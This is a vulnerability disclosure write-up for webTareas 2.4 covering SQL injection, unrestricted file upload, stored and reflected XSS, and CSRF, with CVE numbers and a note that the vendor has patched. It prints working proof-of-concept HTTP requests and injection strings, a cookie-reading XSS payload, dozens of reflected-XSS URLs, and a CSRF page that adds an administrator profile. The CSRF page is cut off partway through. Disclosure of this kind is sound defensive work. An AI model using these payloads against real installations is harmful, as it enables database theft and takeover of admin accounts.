webTareas 2.4 - Multiple Vulnerabilities
TL;DR
I have found five security issues on webTareas <= 2.4:
1 - SQL Injection: An unauthenticated user is able to perform Time and Boolean-based blind SQL Injection on the endpoint /includes/library.php, via the sor_cible, sor_champs, and sor_ordre HTTP POST parameters.
2 - Unrestricted File Upload: An authenticated user is able to arbitrarily upload potentially dangerous files without restrictions. This is working by adding or replacing a personal profile picture. The affected endpoint is /includes/upload.php on the HTTP POST data.
3 - Multiple Reflected XSS: An authenticated user is able to inject arbitrary web script or HTML and achieve a Reflected Cross-Site Scripting attack against the platform users and administrators. The issue affects every endpoint on the application because it is related on how each URL is echoed back on every response page.
4 - Stored XSS: An authenticated user is able to store arbitrary web script or HTML and achieve a Stored Cross-Site Scripting attack against the platform users and administrators. This is possible by creating or editing a client name in the clients section. The affected endpoint is /clients/editclient.php via the HTTP POST cn parameter.
5 - Cross-Site Request Forgery (CSRF): A remote attacker is able to create a new administrative profile and add a new user to the new profile without the victim’s knowledge. This is possible by crafting an HTML page with predefined data for the /userprofiles/edituserprofile.php and /users/edituser.php URLs, and enticing an authenticated admin user to visit an attacker’s web page.
Product Information
- Product Name: webTareas
- Affected Versions: <= 2.4
- Product Web Page: https://sourceforge.net/projects/webtareas/
- Vulnerability Disclosure Info Web Page: https://sourceforge.net/p/webtareas/tickets/
webTareas is a web-based collaboration opensource tool, capable to perform end-to-end project and corporate management. The developers are very active to add new features and to fix security bugs in blazing speed.
During a security auditing of the product, I have found five issues. Then, I’ve opened a ticket in private mode on SourceForge, with a detailed report attached.
The fixes were developed by the owner two day after my vulnerability notification. That’s a very professional way to handle high impact security vulnerabilities!
It is recommended to apply the latest patch at the time of writing, 2.4p2, as published on the product blog page.
Vulnerability Details
1 - Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) - CWE-89
- Summary: An unauthenticated user can perform Time-based Boolean Blind SQL Injection attack to access all the data in the database and obtain access to the webTareas application.
- Prerequisites: None.
- CVE and CVSS Score: CVE-2021-41920 | 7.5 (High)
Affected Endpoints
- URL: http://hostname/includes/library.php
- HTTP Parameters: sor_cible, sor_champs, sor_ordre
Step-by-step instructions and PoC
The application is vulnerable in the default installation, without any customization.
This security issue is found through source code analysis. In particular, the source file webtareas/includes/library.php has both the sources and the sinks needed to analyze and exploit the vulnerability.
The file does not contain require the user to be authenticated. The following authorization code is missing on the beginning of library.php file:
$checkSession = true;
Beginning from line 189, there are the sinks, or the parameters accepting user data:
// extract sorting variables
$sor_cible = isset($_POST['sor_cible']) ? $_POST['sor_cible'] : '';
$sor_champs = isset($_POST['sor_champs']) ? $_POST['sor_champs'] : '';
$sor_ordre = isset($_POST['sor_ordre']) ? $_POST['sor_ordre'] : '';
Those parameters are not sanitized, and the sinks are triggered by the conditional branches beginning from line 335:
// update sorting table if query sort column
if (!empty($sor_cible) && $sor_champs != 'none') {
$querymore1 = " WHERE member='$idSession' AND sortid='$sor_cible'";
$sortingDetail = new request();
$sortingDetail->openSorting($querymore1);
$newSortString = "$sor_champs $sor_ordre";
if (count($sortingDetail->sor_member) == 0) { // new sorting string
$tmpsql = 'INSERT INTO ' . $tablePrefix . "sorting (member,sortid,sortstr) VALUES ('$idSession','$sor_cible','$newSortString')";
connectSql($tmpsql);
} elseif ($newSortString != $sortingDetail->sor_sortstr[0]) { // sorting string changed
$tmpsql = 'UPDATE ' . $tablePrefix . "sorting SET sortstr='$newSortString' WHERE member=$idSession AND sortid='$sor_cible'";
connectSql($tmpsql);
}
}
This means there are 3 ways to tamper the page parameters to achieve SQL Injection:
1. Injecting code only in sor_cible parameter.
2. Injecting code in the sor_champs parameter and using a non-null sor_cible parameter.
3. Injecting code in the sor_ordre parameter and using non-null sor_champs and sor_cible parameters.
For the first way, it was found that the application behavior is different when a user executes TRUE or FALSE SQL statement conditions. The following request will be evaluated as TRUE (f of string foobar is ASCII 102) and the sleep statement will delay the response by 3 seconds:
POST /includes/library.php HTTP/1.1
Content-Length: 81
Host: hostname
Upgrade-Insecure-Requests: 1
Accept: text/html
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36
Connection: close
sor_cible=aaa' AND 0=(SELECT IF(ORD(SUBSTRING('foobar',1,1))=102,sleep(3),0))-- -
Enabling query logging on MySQL, the full query will be as the following:
SELECT sor.* FROM zG9sorting sor WHERE member='0' AND sortid='aaa' AND 0=(SELECT IF(ORD(SUBSTRING('foobar',1,1))=102,sleep(3),0))-- -'
The following request will be evaluated as FALSE (f of string foobar is not ASCII 103) and the sleep statement will not be triggered, returning immediately the response:
POST /includes/library.php HTTP/1.1
Content-Length: 81
Host: hostname
Upgrade-Insecure-Requests: 1
Accept: text/html
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36
Connection: close
sor_cible=aaa' AND 0=(SELECT IF(ORD(SUBSTRING('foobar',1,1))=103,sleep(3),0))-- -
For the second way, the application behavior is different when a user executes TRUE or FALSE SQL statement conditions. The following request will be evaluated as TRUE (f of string foobar is ASCII 102):
POST /includes/library.php HTTP/1.1
Content-Length: 133
Host: hostname
Upgrade-Insecure-Requests: 1
Accept: text/html
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36
Connection: close
sor_champs=aaa' WHERE 1=(SELECT (CASE WHEN (ORD(MID('foobar',1,1))=102) THEN 1 ELSE (SELECT 2 UNION SELECT 3) END))-- -&sor_cible=aaa
The response body will be empty:
HTTP/1.1 200 OK
Date: Tue, 28 Sep 2021 21:25:07 GMT
Server: Apache/2.4.29 (Ubuntu)
Set-Cookie: webTareasSID=hpc1gs0985dorhep36s9n7tbvv; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8
The full query will be as the following:
UPDATE zG9sorting SET sortstr='aaa' WHERE 1=(SELECT (CASE WHEN (ORD(MID('foobar',1,1))=102) THEN 1 ELSE (SELECT 2 UNION SELECT 3) END))-- - ' WHERE member=0 AND sortid='aaa'
The following request will be evaluated as FALSE (f of string foobar is not ASCII 103):
POST /includes/library.php HTTP/1.1
Content-Length: 133
Host: hostname
Upgrade-Insecure-Requests: 1
Accept: text/html
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36
Connection: close
sor_champs=aaa' WHERE 1=(SELECT (CASE WHEN (ORD(MID('foobar',1,1))=103) THEN 1 ELSE (SELECT 2 UNION SELECT 3) END))-- -&sor_cible=aaa
The response body will contain a database informative message:
HTTP/1.1 200 OK
Date: Tue, 28 Sep 2021 21:26:24 GMT
Server: Apache/2.4.29 (Ubuntu)
Set-Cookie: webTareasSID=56425alqgh47f0ur39f4mmke4p; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Length: 38
Connection: close
Content-Type: text/html; charset=UTF-8
Subquery returns more than 1 row(1242)
For the third way, the application behavior is different when a user executes TRUE or FALSE SQL statement conditions. The following request will be evaluated as TRUE (f of string foobar is ASCII 102):
POST /includes/library.php HTTP/1.1
Content-Length: 133
Host: hostname
Upgrade-Insecure-Requests: 1
Accept: text/html
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36
Connection: close
sor_champs=aaa&sor_cible=aaa&sor_ordre=aaa' WHERE 1=(SELECT (CASE WHEN (ORD(MID('foobar',1,1))=102) THEN 1 ELSE (SELECT 2 UNION SELECT 3) END))-- -
The response body will be empty:
HTTP/1.1 200 OK
Date: Tue, 28 Sep 2021 21:31:29 GMT
Server: Apache/2.4.29 (Ubuntu)
Set-Cookie: webTareasSID=g6g1q71b75dberjosvi202e90l; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8
The full query will be as the following:
UPDATE zG9sorting SET sortstr='aaa aaa' WHERE 1=(SELECT (CASE WHEN (ORD(MID('foobar',1,1))=102) THEN 1 ELSE (SELECT 2 UNION SELECT 3) END))-- -' WHERE member=0 AND sortid='aaa'
The following request will be evaluated as FALSE (f of string foobar is not ASCII 103):
POST /includes/library.php HTTP/1.1
Content-Length: 133
Host: hostname
Upgrade-Insecure-Requests: 1
Accept: text/html
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36
Connection: close
sor_champs=aaa&sor_cible=aaa&sor_ordre=aaa' WHERE 1=(SELECT (CASE WHEN (ORD(MID('foobar',1,1))=103) THEN 1 ELSE (SELECT 2 UNION SELECT 3) END))-- -
The response body will contain a database informative message:
HTTP/1.1 200 OK
Date: Tue, 28 Sep 2021 21:36:56 GMT
Server: Apache/2.4.29 (Ubuntu)
Set-Cookie: webTareasSID=07tjdueb24bcco59kl6glmj746; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Length: 38
Connection: close
Content-Type: text/html; charset=UTF-8
Subquery returns more than 1 row(1242)
It is possible to create a python tool to extract all the data from the database.
The banner of the database is gathered as PoC of the vulnerability:
Also, the web application administrative credentials can be dumped:
Security Impact
By exploiting this issue an attacker is able to access all the data in the database and obtain access to the webTareas application, because all the data, including administrative credentials, can be extracted and cracked.
Also, if the database itself has permission misconfigurations, the underlying operating system could be also compromised.
2 - Unrestricted Upload of File with Dangerous Type - CWE-434
- Summary: The webTareas web interface does not protect against arbitrarily and potentially dangerous file uploading. Any user able to change the profile picture can arbitrarily upload any kind of file.
- Prerequisites: None.
- CVE and CVSS Score: CVE-2021-41919 | 8.8 (High)
Step-by-step instructions and PoC
A remote user, authenticated to the webTareas web interface, can arbitrarily upload potentially dangerous files without restrictions. This is working by adding or replacing his personal profile picture.
Affected Endpoints
- URL: https://hostname/includes/upload.php
- HTTP Parameters: POST data
Below are the evidences with the vulnerability details and the payloads used.
To exploit the vulnerability, a simple HTML file with JavaScript code is uploaded.
It can be done directly from the web interface, removing the tag attribute accept="image/*" to bypass client-side restriction, or with the following HTTP request:
POST /includes/upload.php HTTP/1.1
Host: hostname
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-FILENAME: xss.html
Content-Type: text/html
Content-Length: 385
Origin: http://hostname
Connection: close
Referer: http://hostname/preferences/updateuser.php?
Cookie: webTareasSID=dp2pj14hlavst3r4bo23iviha4
<html>
<script>alert('XSS')</script>
<!-- Write your comments here -->
<!-- Write your comments here -->
<!-- Write your comments here -->
<!-- Write your comments here -->
<!-- Write your comments here -->
<!-- Write your comments here -->
<!-- Write your comments here -->
<!-- Write your comments here -->
<!-- Write your comments here -->
<!-- Write your comments here -->
</html>
The HTTP response will disclose the full path of the profile picture:
HTTP/1.1 200 OK
Date: Tue, 28 Sep 2021 22:20:31 GMT
Server: Apache/2.4.29 (Ubuntu)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Length: 42
Connection: close
Content-Type: text/html; charset=UTF-8
/var/www/hostname/files/tmpYdZ5tI
By correlating the full path with the application URL, it is possible to download or execute the file on the link:
http://hostname/files/tmpYdZ5tI
Requesting the file, the JavaScript payload will be executed:
Security Impact
This vulnerability would allow an attacker to exploit the platform by injecting code or malware and, under certain conditions, to execute code on remote user browsers.
3 - Improper Neutralization of Input During Web Page Generation (Stored Cross-Site Scripting) - CWE-79
- Summary: An authenticated remote user is able to store arbitrary web script or HTML by creating or editing a client name in the clients section, due to incorrect sanitization of user-supplied data and achieve a Stored Cross-Site Scripting attack against the platform users and administrators.
- Prerequisites: Valid user session with the privileges to add or edit clients to webTareas web application.
- CVE and CVSS Score: CVE-2021-41917 | 5.4 (Medium)
Step-by-step instructions and PoC
A remote user, authenticated to the webTareas web application, through Clients section, can arbitrarily inject and store JavaScript code. This is working on both adding a new client, or by editing an existing one.
Affected Endpoints
- URL: https://hostname/clients/editclient.php
- HTTP Parameters: cn
Below are the evidences with the vulnerability details and the payloads used.
To exploit the vulnerability, a XSS payload is uploaded. It can be done directly from the web interface: 1. Go to Client menu: http://hostname/clients/listclients.php 2. Add a new client with the ‘+’ button. 3. Create a new client. On the Name field, insert the following value:
client_name<img src='#' onerror=alert(document.cookie) />
- Select Save.
Alternatively, it is possible to submit the following HTTP request:
POST /clients/editclient.php HTTP/1.1
Host: hostname
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------39432385815962433282511417701
Content-Length: 2349
Origin: http://hostname
Connection: close
Referer: http://hostname/clients/editclient.php?
Cookie: webTareasSID=dp2pj14hlavst3r4bo23iviha4
Upgrade-Insecure-Requests: 1
-----------------------------39432385815962433282511417701
Content-Disposition: form-data; name="action"
add
-----------------------------39432385815962433282511417701
Content-Disposition: form-data; name="cown"
1
-----------------------------39432385815962433282511417701
Content-Disposition: form-data; name="cn"
client_name<img src='#' onerror=alert(document.cookie) />
-----------------------------39432385815962433282511417701
Content-Disposition: form-data; name="add"
-----------------------------39432385815962433282511417701
Content-Disposition: form-data; name="zip"
-----------------------------39432385815962433282511417701
Content-Disposition: form-data; name="ct"
-----------------------------39432385815962433282511417701
Content-Disposition: form-data; name="cou"
-----------------------------39432385815962433282511417701
Content-Disposition: form-data; name="wp"
-----------------------------39432385815962433282511417701
Content-Disposition: form-data; name="fa"
-----------------------------39432385815962433282511417701
Content-Disposition: form-data; name="url"
-----------------------------39432385815962433282511417701
Content-Disposition: form-data; name="email"
-----------------------------39432385815962433282511417701
Content-Disposition: form-data; name="curr"
-----------------------------39432385815962433282511417701
Content-Disposition: form-data; name="wc"
1
-----------------------------39432385815962433282511417701
Content-Disposition: form-data; name="pym"
1
-----------------------------39432385815962433282511417701
Content-Disposition: form-data; name="pyt"
7
-----------------------------39432385815962433282511417701
Content-Disposition: form-data; name="c"
-----------------------------39432385815962433282511417701
Content-Disposition: form-data; name="ssc"
-----------------------------39432385815962433282511417701
Content-Disposition: form-data; name="file1"; filename=""
Content-Type: application/octet-stream
-----------------------------39432385815962433282511417701
Content-Disposition: form-data; name="attnam1"
-----------------------------39432385815962433282511417701
Content-Disposition: form-data; name="atttmp1"
-----------------------------39432385815962433282511417701--
The JavaScript payload will trigger immediately:
Also, viewing the client list, the JavaScript payload will also be triggered:
Security Impact
By exploiting this issue an attacker is able to target application users who are able to access the clients page within the browser with several type of direct or indirect impacts such as stealing cookies (the HttpOnly flag is missing from the session cookies), modifying a web page, capturing clipboard contents, keylogging, port scanning, dynamic downloads and other attacks. This type of stored XSS does not require user interaction.
4 - Improper Neutralization of Input During Web Page Generation (Reflected Cross-Site Scripting) - CWE-79
- Summary: An authenticated remote user is able to inject arbitrary web script or HTML due to incorrect sanitization of user-supplied data and achieve a Reflected Cross-Site Scripting attack against the platform users and administrators.
- Prerequisites: None.
- CVE and CVSS Score: CVE-2021-41918 | 5.4 (Medium)
Step-by-step instructions and PoC
A malicious user can cause an administrator user to supply dangerous content to the vulnerable page, which is then reflected back to the user and executed by the web browser. The most common mechanism for delivering malicious content is to include it as a parameter in a URL that is posted publicly or e-mailed directly to victims.
Affected Endpoints:
- URL: http://hostname/
- HTTP Parameter: URL path and user-supplied parameters.
Below are the evidences with the vulnerability details and the payloads used.
To execute the JavaScript payload in the browser context, paste the URL in the browser:
http://hostname/administration/print_layout.php?doc_type=rhsyf"><script>alert(1)</script>aez00
The payload is reflected on the response.
The issue affects every endpoint on the application because it is related on how each URL is echoed back on every response page.
Other examples of vulnerable URLs are the following:
http://hostname/administration/print_layout.php?doc_type=rhsyf"><script>alert(1)</script>aez00
http://hostname/administration/print_layout.php?doc_type=11x4qvr</script><script>alert(1)</script>oxa79
http://hostname/administration/systeminfo.php/jhdab<script>alert(1)</script>kt1h6
http://hostname/administration/systeminfo.php/themes/camping/includes/avatarss22m9<script>alert(1)</script>wew7l/f2.png?ver=1629353246
http://hostname/administration/systeminfo.php/themes/camping/includes/tiny_mcebybn9<script>alert(1)</script>hvmtz/tiny_mce.js?ver=1629353245
http://hostname/administration/systeminfo.php/themes/camping/preferences/pref.php/c9y1c<script>alert(1)</script>se108?
http://hostname/administration/systeminfo.php/themes/camping/themes/campingbtuvt<script>alert(1)</script>azo6r/attention.png
http://hostname/administration/systeminfo.php/themes/camping/themes/campingxs581<script>alert(1)</script>phopf/btn_camera.png
http://hostname/administration/systeminfo.php/themes/camping/themes/campingicy03<script>alert(1)</script>utpxd/btn_download.png
http://hostname/administration/systeminfo.php/themes/camping/themes/camping/jquery-uixgpwm<script>alert(1)</script>t3sf5/jquery-ui.min.css?ver=1629353244
http://hostname/administration/systeminfo.php/themes/camping/themes/camping/jquery-uia9822<script>alert(1)</script>ekstl/jquery.timepicker.css
http://hostname/administration/systeminfo.php/themes/camping/themes/camping/selectswut7<script>alert(1)</script>zsgzh/pqselect.min.css
http://hostname/administration/systeminfo.php/themes/camping/themes/menum71co<script>alert(1)</script>lxg91/bottle-in-fall.min.css
http://hostname/administration/systeminfo.php/themes/camping/themes/menusfzjw<script>alert(1)</script>rb30r/color_wheel.png
http://hostname/administration/systeminfo.php/themes/camping/themes/menuwquam<script>alert(1)</script>prneh/stylesheet.min.css
http://hostname/administration/systeminfo.php/themes/general/login.php/es5pf<script>alert(1)</script>cwu7y
http://hostname/administration/systeminfo.php/themes/general/search.php/q6byt<script>alert(1)</script>pznw1
http://hostname/administration/systeminfo.php/themes/preferences/pref.php/mf9h8<script>alert(1)</script>gqh57
http://hostname/clients/listclients.php/sdla1"><script>alert(1)</script>gk0tf
http://hostname/clients/listclients.php/favicon.ico?&borne1=12vbjfb"><script>alert(1)</script>t702t
http://hostname/clients/listclients.php/general/webTareasLogo.png?&borne1=12npl92"><script>alert(1)</script>l2hew
http://hostname/clients/listclients.php/includes/avatars/f2.png?&borne1=12bmoh7"><script>alert(1)</script>vgwqw
http://hostname/clients/listclients.php/includes/tiny_mce/tiny_mce.js?&borne1=12tq7p7"><script>alert(1)</script>rl7k7
http://hostname/clients/listclients.php/javascript/chattab.min.js?&borne1=156emsnh"><script>alert(1)</script>mvucc
http://hostname/clients/listclients.php/javascript/form-control.min.js?&borne1=12vtigt"><script>alert(1)</script>z79e9
http://hostname/clients/listclients.php/javascript/general.min.js?&borne1=12b5pk5"><script>alert(1)</script>en74e
http://hostname/clients/listclients.php/javascript/jquery-1.11.1.min.js?&borne1=12if3kj"><script>alert(1)</script>zubps
http://hostname/clients/listclients.php/javascript/jquery-ui-1.11.0.min.js?&borne1=156civyp"><script>alert(1)</script>pwmgb
http://hostname/clients/listclients.php/javascript/jquery.timepicker.min.js?&borne1=156obj3j"><script>alert(1)</script>nmdg5
http://hostname/clients/listclients.php/javascript/jquery.ui.dialog-clickoutside.js?&borne1=156uyo48"><script>alert(1)</script>nwv0f
http://hostname/clients/listclients.php/javascript/pqselect.min.js?&borne1=12mfdru"><script>alert(1)</script>jyovq
http://hostname/clients/listclients.php/themes/camping/attention.png?&borne1=12ffsyq"><script>alert(1)</script>vrqbe
http://hostname/clients/listclients.php/themes/camping/btn_camera.png?&borne1=12i87ld"><script>alert(1)</script>s27qh
http://hostname/clients/listclients.php/themes/camping/btn_download.png?&borne1=12ddgdp"><script>alert(1)</script>hh545
http://hostname/clients/listclients.php/themes/camping/btn_quicklinks.png?&borne1=12hbrhk"><script>alert(1)</script>pewvr
http://hostname/clients/listclients.php/themes/camping/btn_search.png?&borne1=36bdq2f"><script>alert(1)</script>nma3x
http://hostname/clients/listclients.php/themes/camping/icon_sort_az.gif?&borne1=156p15ke"><script>alert(1)</script>ds1kz
http://hostname/clients/listclients.php/themes/camping/jquery-ui/jquery-ui.min.css?&borne1=12z254y"><script>alert(1)</script>sswng
http://hostname/clients/listclients.php/themes/camping/jquery-ui/jquery.timepicker.css?&borne1=12thwvq"><script>alert(1)</script>ln1ou
http://hostname/clients/listclients.php/themes/camping/select/pqselect.min.css?&borne1=156rkp4q"><script>alert(1)</script>cbq6h
http://hostname/clients/listclients.php/themes/camping/stylesheet.min.css?&borne1=12ny1z5"><script>alert(1)</script>n6l39
http://hostname/clients/listclients.php/themes/menu/bottle-in-fall.min.css?&borne1=12e992o"><script>alert(1)</script>ows29
http://hostname/clients/listclients.php/themes/menu/color_wheel.png?&borne1=156ciz7v"><script>alert(1)</script>tcsof
http://hostname/clients/listclients.php/themes/menu/stylesheet.min.css?&borne1=156iqfgg"><script>alert(1)</script>ekiat
http://hostname/contacts/listcontacts.php?groupby=jx0tw"><script>alert(1)</script>tbd9l&view=
http://hostname/contacts/listcontacts.php?groupby=firstname&view=t0270"><script>alert(1)</script>xx70m
http://hostname/general/login.php?logout=pczkb"onmouseover="alert(1)"iuyda
http://hostname/general/login.php?session=ulp2d"onmouseover="alert(1)"crcq7
http://hostname/general/login.php/vq77w?otcdc"onmouseover="alert(1)"wc8jh=1
http://hostname/general/search.php?searchtype=p155e"><script>alert(1)</script>l0lvf
Security Impact
By exploiting this issue an attacker is able to target administrator users who are able to access the plugin configuration page within the browser with several type of direct or indirect impacts such as stealing cookies (the HttpOnly flag is missing from the session cookies), modifying a web page, capturing clipboard contents, keylogging, port scanning, dynamic downloads and other attacks. This type of reflected XSS does require user interaction.
5 - Cross-Site Request Forgery (CSRF) - CWE-352
- Summary: A remote attacker is able to add an administrator profile and user without the victim’s knowledge, by enticing an authenticated admin user to visit an attacker’s web page. The application does not use CSRF token for any POST request. An attacker can craft an HTML page with predefined data for the /userprofiles/edituserprofile.php and /users/edituser.php URLs, and send them to the victim. The server will execute the actions intended by the attacker.
- Prerequisites: None.
- CVE and CVSS Score: CVE-2021-41916 | 8.8 (High)
Step-by-step instructions and PoC
An authenticated administrator user that visits a crafted HTML page with a XMLHttpRequest function can add another administrator on webTareas web application.
Affected Endpoints
Below are the evidences with the vulnerability details and the payloads used.
By default, there is only one administrator on the platform:
Create the CSRF request by adding the following code on the file served on another machine, in this case a local Kali Linux, in the file: /var/www/html/csrf.html
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://www.webtareas.net/userprofiles/edituserprofile.php?" method="POST" enctype="multipart/form-data">
<input type="hidden" name="action" value="add" />
<input type="hidden" name="perm[0]" value="Profile|Admin" />
<input type="hidden" name="perm[1]" value="User|Read" />
<input type="hidden" name="perm[2]" value="User|Write" />
<input type="hidden" name="perm[3]" value="User|Edit" />
<input type="hidden" name="perm[4]" value="User|Admin" />
<input type="hidden" name="perm[5]" value="System Log|Read" />
<input type="hidden" name="perm[6]" value="System Log|Admin" />
<input type="hidden" name="perm[7]" value="System Settings|Read" />
<input type="hidden" name="perm[8]" value="System Settings|Edit" />
<input type="hidden" name="perm[9]" value="Deny IP|Read" />
<input type="hidden" name="perm[10]" value="Deny IP|Admin" />
<input type="hidden" name="perm[11]" value="Service|Read" />
<input type="hidden" name="perm[12]" value="Service|Write" />
<input type="hidden" name="perm[13]" value="Service|Edit" />
<input type="hidden" name="perm[14]" value="Service|Admin" />
<input type="hidden" name="perm[15]" value="Material|Read" />
<input type="hidden" name="perm[16]" value="Material|Write" />
<input type="hidden" name="perm[17]" value="Material|Edit" />
<input type="hidden" name="perm[18]" value="Material|Admin" />
<input type="hidden" name="perm[19]" value="Equipment|Read" />
<input type="hidden" name="perm[20]" value="Equipment|Write" />
<input type="hidden" name="perm[21]" value="Equipment|Edit" />
<input type="hidden" name="perm[22]" value="Equipment|Admin" />
<input type="hidden" name="perm[23]" value="Company Detail|Read" />
<input type="hidden" name="perm[24]" value="Company Detail|Edit" />
<input type="hidden" name="perm[25]" value="Period|Read" />
<input type="hidden" name="perm[26]" value="Period|Edit" />
<input type="hidden" name="perm[27]" value="Work Calendar|Read" />
<input type="hidden" name="perm[28]" value="Work Calendar|Write" />
<input type="hidden" name="perm[29]" value="Work Calendar|Edit" />
<input type="hidden" name="perm[30]" value="Work Calendar|Admin" />
<input type="hidden" name="perm[31]" value="Leave|Read" />
<input type="hidden" name="perm[32]" value="Leave|Write" />
<input type="hidden" name="perm[33]" value="Leave|Edit" />
<input type="hidden" name="perm[34]" value="Leave|Admin" />
<input type="hidden" name="perm[35]" value="Leave Request|Edit" />
<input type="hidden" name="perm[36]" value="Leave Request|Admin" />
<input type="hidden" name="perm[37]" value="Client|Read" />
<input type="hidden" name="perm[38]" value="Client|Write" />
<input type="hidden" name="perm[39]" value="Client|Edit" />
<input type="hidden" name="perm[40]" value="Client|Admin" />
<input type="hidden" name="perm[41]" value="Contact|Read" />
<input type="hidden" name="perm[42]" value="Contact|Edit" />
<input type="hidden" name="perm[43]" value="Project|Read" />
<input type="hidden" name="perm[44]" value="Project|Write" />
<input type="hidden" name="perm[45]" value="Project|Edit" />
<input type="hidden" name="perm[46]" value="Project|Admin" />
<input type="hidden" name="perm[47]" value="Meeting|Read" />
<input type="hidden" name="perm[48]" value="Meeting|Write" />
<input type="hidden" name="perm[49]" value="Meeting|Edit" />
<input type="hidden" name="perm[50]" value="Meeting|Admin" />
<input type="hidden" name="perm[51]" value="Approval Procedure|Read" />
<input type="hidden" name="perm[52]" value="Approval Procedure|Write" />
<input type="hidden" name="perm[53]" value="Approval Procedure|Edit" />
<input type="hidden" name="perm[54]" value="Approval Procedure|Admin" />
<input type="hidden" name="perm[55]" value="TextCustomization|Admin" />
<input type="hidden" name="perm[56]" value="File|Read" />
<input type="hidden" name="perm[57]" value="File|Write" />
<input type="hidden" name="perm[58]" value="File|Edit" />
<input type="hidden" name="perm[59]" value="File|Admin" />
<input type="hidden" name="perm[60]" value="Currency Rate|Read" />
<input type="hidden" name="perm[61]" value="Currency Rate|Edit" />
<input type="hidden" name="perm[62]" value="Custom Fields|Read" />
<input type="hidden" name="perm[63]" value="Custom Fields|Edit" />
<input type="hidden" name="perm[64]" value="Form Template|Read" />
<input type="hidden" name="perm[65]" value="Form Template|Edit" />
<input type="hidden" name="perm[66]" value="Forum|Read" />
<input type="hidden" name="perm[67]" value="Forum|Write" />
<input type="hidden" name="perm[68]" value="Forum|Admin" />
<input type="hidden" name="perm[69]" value="Locations|Read" />
<input type="hidden" name="perm[70]" value="Locations|Edit" />
<input type="hidden" name="perm[71]" value="Phase Set|Read" />
<input type="hidden" name="perm[72]" value="Phase Set|Edit" />
<input type="hidden" name="perm[73]" value="Report|Read" />
<input type="hidden" name="perm[74]" value="Report|Edit" />
<input type="hidden" name="perm[75]" value="Accounting|Read" />
<input type="hidden" name="perm[76]" value="Accounting|Edit" />
<input type="hidden" name="perm[77]" value="Invoice|Read" />
<input type="hidden" name="perm[78]" value="Invoice|Write" />
<input type="hidden" name="perm[79]" value="Invoice|Edit" />
<input type="hidden" name="perm[80]" value="Invoice|Admin" />
<input type="hidden" name="perm[81]" value="Payment|Read" />
<input type="hidden" name="perm[82]" value="Payment|Write" />
<input type="hidden" name="perm[83]" value="Payment|Edit" />
<input type="hidden" name="perm[84]" value="Payment|Admin" />
<input type="hidden" name="perm[85]" value="Expense|Read" />
<input type="hidden" name="perm[86]" value="Expense|Write" />
<input type="hidden" name="perm[87]" value="Expense|Edit" />
<input type="hidden" name="perm[88]" value="Expense|Admin" />
<input type="hidden" name="perm[89]" value="Calendar|Read" />
<input type="hidden" name="perm[90]" value="Calendar|Admin" />
<input type="hidden" name="perm[91]" value="Extension|Admin" />
<input type="hidden" name="perm[92]" value="Print Layout|Admin" />
<input type="hidden" name="n" value="admin2" />
<input type="hidden" name="np" value="admin2" />
<input type="hidden" name="dep" value="0" />
<input type="hidden" name="loc" value="0" />
<input type="hidden" name="langd" value="" />
<input type="hidden" name="dtft" value="" />
<input type="hidden" name="tmft" value="" />
<input type="hidden" name="wc" value="0" />
<input type="hidden" name="drc" value="0" />
<input type="hidden" name="vals[0]" value="Y" />
<input type="hidden" name="vals[1]" value="Y" />
<input type="hidden" name="vals[4]" value="Y" />
<input type="hidden" name="vals[5]" value="Y" />
<input type="hidden" name="vals[6]" value="Y" />
<input type="hidden" name="vals[7]" value="Y" />
<input type="hidden" name="vals[9]" value="Y" />
<input type="hidden" name="vals[10]" value="Y" />
<input type="hidden" name="vals[11]" value="Y" />
<input type="hidden" name="vals[14]" value="Y" />
<input type="hidden" name="vals[15]" value="Y" />
<input type="hidden" name="vals[18]" value="Y" />
